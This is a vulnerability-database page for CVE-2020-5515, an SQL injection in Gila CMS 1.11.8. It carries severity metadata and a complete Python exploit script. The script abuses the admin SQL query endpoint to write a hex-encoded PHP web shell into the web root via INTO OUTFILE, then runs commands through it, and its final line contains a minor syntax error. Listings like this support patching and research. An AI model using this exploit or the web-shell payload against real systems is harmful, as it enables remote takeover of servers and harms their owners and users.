Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Gila CMS 1.11.8 SQL Injection
2020.06.17
Credit:
Carlos Ramirez L.
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2020-5515
CWE:
CWE-89
Ogólna skala CVSS:
6.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
8/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Jednorazowa
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
# Exploit Title: Gila CMS 1.11.8 - 'query' SQL Injection # Date: 2020-06-15 # Exploit Author: Carlos Ramírez L. (BillyV4) # Vendor Homepage: https://gilacms.com/ # Software Link: https://github.com/GilaCMS/gila/releases/tag/1.11.8 # Version: Gila 1.11.8 # Tested on: Gila 1.11.8 # CVE : CVE-2020-5515 import requests as req import time as vremeto import sys as sistemot import re as regularno if len(sistemot.argv) < 2: print("Usage: ./CVE_2020_5515.py ip:port") sistemot.exit(19) else: ip = sistemot.argv[1] cookies = {'PHPSESSID': 'r2k5bp52edr9ls36d35iohdlng', 'GSESSIONID': '21k2mbxockr9sf1v1agxkwpkt6ruzdl6vjz6fgmt7s0e72hlas'} webpath = "/gila-1.11.8/admin/sql?query=" query1 = "SELECT id FROM user LIMIT 0,1 INTO OUTFILE " localpath = "\'C://xampp//htdocs//" shellname = "webshell.php\' " query2 = "LINES TERMINATED BY " print("[*] Injecting ") cmdphp = "0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297" cmdphp += "b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d" cmdphp += "2824636d64293b206563686f20273c2f7072653e24636d643c7072653e273b2064696" cmdphp += "53b207d203f3e" url = 'http://' + ip + webpath + query1 + localpath + shellname + query2 + cmdphp r = req.get(url, cookies=cookies) vremeto.sleep(1) print("[*] Executing") r = req.get("http://" + ip + "/" + shellname + "?cmd=whoami") print("You have a webshell in http://" + ip + "/" + shellname "?cmd=command")
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top